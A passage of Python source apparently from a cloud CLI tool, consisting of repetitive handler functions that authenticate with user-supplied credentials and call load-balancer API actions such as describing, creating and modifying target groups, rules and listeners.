reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DisassociateTargetGroupsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DisassociateTargetGroups(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteRewrite(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteRewriteRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteRewrite(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTargetGroupInstances(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTargetGroupInstancesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeTargetGroupInstances(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doAssociateTargetGroups(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.AssociateTargetGroupsRequest()
model.from_json_string(json.dumps(args))
rsp = client.AssociateTargetGroups(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeLoadBalancersDetail(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeLoadBalancersDetailRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeLoadBalancersDetail(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeregisterTargetGroupInstances(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeregisterTargetGroupInstancesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeregisterTargetGroupInstances(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeLoadBalancers(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeLoadBalancersRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeLoadBalancers(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeBlockIPList(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeBlockIPListRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeBlockIPList(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeListeners(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeListenersRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeListeners(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeClassicalLBTargets(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeClassicalLBTargetsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeClassicalLBTargets(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateTopic(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateTopicRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateTopic(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doBatchRegisterTargets(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.BatchRegisterTargetsRequest()
model.from_json_string(json.dumps(args))
rsp = client.BatchRegisterTargets(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeClsLogSet(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeClsLogSetRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeClsLogSet(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeCustomizedConfigList(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeCustomizedConfigListRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeCustomizedConfigList(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTargetWeight(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyTargetWeightRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyTargetWeight(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTaskStatus(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTaskStatusRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeTaskStatus(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTargetGroups(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTargetGroupsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeTargetGroups(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyRule(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyRuleRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyRule(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteRule(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteRuleRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteRule(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doSetLoadBalancerClsLog(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.SetLoadBalancerClsLogRequest()
model.from_json_string(json.dumps(args))
rsp = client.SetLoadBalancerClsLog(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTargetGroupList(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTargetGroupListRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeTargetGroupList(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyBlockIPList(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyBlockIPListRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyBlockIPList(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateTargetGroup(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateTargetGroupRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateTargetGroup(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTargets(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTargetsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeTargets(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeRewrite(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeRewriteRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeRewrite(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doRegisterTargetsWithClassicalLB(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.RegisterTargetsWithClassicalLBRequest()
model.from_json_string(json.dumps(args))
rsp = client.RegisterTargetsWithClassicalLB(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTargetPort(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyTargetPortRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyTargetPort(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTargetGroupAttribute(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyTargetGroupAttributeRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyTargetGroupAttribute(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeClassicalLBHealthStatus(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeClassicalLBHealthStatusRequest()
